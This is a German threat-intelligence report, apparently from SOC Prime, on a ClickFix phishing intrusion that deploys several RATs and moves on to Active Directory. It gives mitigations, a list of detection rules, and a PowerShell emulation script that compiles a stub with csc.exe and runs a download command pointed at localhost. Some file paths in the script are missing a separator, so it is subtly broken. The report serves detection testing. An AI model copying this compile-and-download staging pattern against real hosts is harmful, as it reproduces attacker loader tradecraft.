SOC Prime Bias: Critical

17 Aug 2026 07:03 UTC

SpaceX1337 ClickFix führt zu Hands-on-Keyboard AD-Kompromittierung

Author Photo
SOC Prime Team linkedin icon Folgen
SpaceX1337 ClickFix führt zu Hands-on-Keyboard AD-Kompromittierung
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Ein Angreifer nutzte einen ClickFix-Phishing-Köder, um das SpaceX1337 RAT einzusetzen, gefolgt von einer mehrstufigen Infektion mit handelsüblichen RATs wie NetSupport, AsyncRAT und Remus. Der Eindringling entwickelte sich von automatischem Credential-Diebstahl zu interaktivem Hands-on-Keyboard-Aktivität, die auf Active Directory abzielt. Der Angreifer versuchte letztendlich die seitliche Bewegung zu einem Domänencontroller und Credential-Stuffing gegen ein VPN-Portal.

Untersuchung

Der Einbruch wurde in einem voll instrumentierten Active Directory Honeynet erfasst, das durchgängige Sichtbarkeit durch EDR-, Zeek- und Suricata-Telemetrie bietet. Forscher verfolgten die Aktivität vom initialen PowerShell-Downloader über umfangreiche ADSI/LDAP-Rekognoszierung und seitliche Bewegung über SMB. Die Untersuchung identifizierte klar den Übergang von der automatisierten Malware-Ausführung zur direkten Interaktion durch einen menschlichen Operator.

Minderung

Organisationen sollten strenge PowerShell-Ausführungsrichtlinien durchsetzen und verdächtige Eltern-Kind-Prozessbeziehungen überwachen, einschließlich explorer.exe zur Ausführung von PowerShell. Sicherheitsteams sollten die On-Host-Kompilierung durch csc.exe und den Missbrauch von LOLBins wie certutil or bitsadmin für externe Downloads. Active Directory sollte auch gestärkt werden, indem sensible Daten aus LDAP-Attributen entfernt und anomale LDAP-Anfragen überwacht werden.

Reaktion

Wenn verdächtige Aktivitäten erkannt werden, sollten Incident-Responder die betroffenen Endpunkte isolieren und potenziell kompromittierte Dienstkonto- und Domänenadministrator-Anmeldeinformationen widerrufen. Die Ermittlungen sollten die Identifizierung mehrerer RAT-Familien priorisieren und nach unbefugten geplanten Aufgaben oder Registrierungsmäßigen Änderungen suchen. VPN-Protokolle sollten auch auf Credential-Stuffing-Versuche aus bekannter bösartiger Infrastruktur überprüft werden.

Angriffsablauf

Erkennungen

Python-Ausführung aus verdächtigen Ordnern (via cmdline)

SOC Prime Team
13. Aug. 2026

Verdächtiger RunMRU-Eintrag mit LOLBin-Semantik (via registry_event)

SOC Prime Team
13. Aug. 2026

Befehlsausführung auf Remote-Host mit Windows Remote Management (via cmdline)

SOC Prime Team
13. Aug. 2026

Mögliche Konto- oder Gruppenaufzählung / -manipulation (via cmdline)

SOC Prime Team
13. Aug. 2026

Verdächtige Domain-Trust-Erkennung (via cmdline)

SOC Prime Team
13. Aug. 2026

Mögliche Erkennung der Systemnetzwerkkonfiguration (via cmdline)

SOC Prime Team
13. Aug. 2026

Verdächtige ausführbare Datei mit nur Zahlen im Namen (via cmdline)

SOC Prime Team
13. Aug. 2026

LOLBAS Schtasks (via cmdline)

SOC Prime Team
13. Aug. 2026

Verwendung von Certutil für Datenkodierung und Zertifikatsoperationen (via cmdline)

SOC Prime Team
13. Aug. 2026

LOLBAS Bitsadmin (via cmdline)

SOC Prime Team
13. Aug. 2026

Mögliches SAM/SYSTEM/SECURITY-Dumping (via cmdline)

SOC Prime Team
13. Aug. 2026

Aufruf verdächtiger .NET-Methoden aus Powershell (via powershell)

SOC Prime Team
13. Aug. 2026

Verdächtige Trycloudflare-Domain-Kommunikation (via dns)

SOC Prime Team
13. Aug. 2026

Mögliche IP-Lookup-Domain-Kommunikationsversuche (via dns)

SOC Prime Team
13. Aug. 2026

IOCs (HashSha256) zur Erkennung: Von ClickFix SpaceX1337 zu Hands-on-Keyboard AD-Angriff

SOC Prime AI-Regeln
13. Aug. 2026

IOCs (HashMd5) zur Erkennung: Von ClickFix SpaceX1337 zu Hands-on-Keyboard AD-Angriff

SOC Prime AI-Regeln
13. Aug. 2026

IOCs (SourceIP) zur Erkennung: Von ClickFix SpaceX1337 zu Hands-on-Keyboard AD-Angriff

SOC Prime AI-Regeln
13. Aug. 2026

IOCs (DestinationIP) zur Erkennung: Von ClickFix SpaceX1337 zu Hands-on-Keyboard AD-Angriff

SOC Prime AI-Regeln
13. Aug. 2026

Hochwertige Sigma-Regel für SpaceX1337 und AdaptixC2-Kommunikation [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
13. Aug. 2026

Erkennung der AdaptixC2-Beacon-Kompilierung und des PowerShell-Loaders [Windows-Prozesserstellung]

SOC Prime AI-Regeln
13. Aug. 2026

Simulationsausführung

Voraussetzung: Der Telemetrie- & Basislinien-Preflight-Check muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der feindlichen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN genau die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle: Ein Gegner hat über einen Phishing-Link initialen Zugriff erlangt. Um ein bekanntes bösartiges .exe nicht auf die Festplatte zu bringen, laden sie eine kleine .cs Quelldatei herunter. Sie rufen dann csc.exe auf, um diese Quelle in eine funktionale Windows- ausführbare Datei (svc.exe) im %TEMP% Verzeichnis zu kompilieren. Unmittelbar nach der Kompilierung verwendet der Angreifer PowerShell, um einen Second-Stage-Loader von einem Remote-C2-Server (simuliert durch einen lokalen Listener) mit dem iwr (Invoke-WebRequest) Alias abzurufen, der im Temp-Ordner gespeichert wird, um den Staging-Prozess zu vervollständigen.

  • Regressions-Testskript:

    # 1. Erstellen Sie eine Dummy-C#-Quelldatei, um die AdaptixC2-Quelle zu simulieren
    $csFile = "$env:TEMPsvc.cs"
    $exeFile = "$env:TEMPsvc.exe"
    $sourceCode = @"
    using System;
    namespace MimicC2 {
        class Program {
            static void Main() { Console.WriteLine("Simuliertes Beacon"); }
        }
    }
    "@
    $sourceCode | Out-File -FilePath $csFile -Encoding ascii
    
    # 2. Simulieren Sie die csc.exe-Kompilierung (löst selection_csc aus)
    # Hinweis: Wir verwenden die exakt in der Erkennungslogik angegebenen Flags
    Start-Process "csc.exe" -ArgumentList "/target:winexe", "/out:$env:TEMPsvc.exe", "$env:TEMPsvc.cs" -Wait
    
    # 3. Simulieren Sie den PowerShell-Download (löst selection_powershell aus)
    # Wir verwenden 'iwr' und den spezifischen OutFile-Pfad, um die Logik zu treffen
    # Mit einer nicht existierenden URL, um echten Netzwerkverkehr zu vermeiden, aber die Befehlszeile wird übereinstimmen
    powershell.exe -Command "iwr -Uri 'http://127.0.0.1' -OutFile `"$env:TEMPx.ps1`""
  • Bereinigung Befehle:

    Remove-Item -Path "$env:TEMPsvc.cs" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPsvc.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPx.ps1" -Force -ErrorAction SilentlyContinue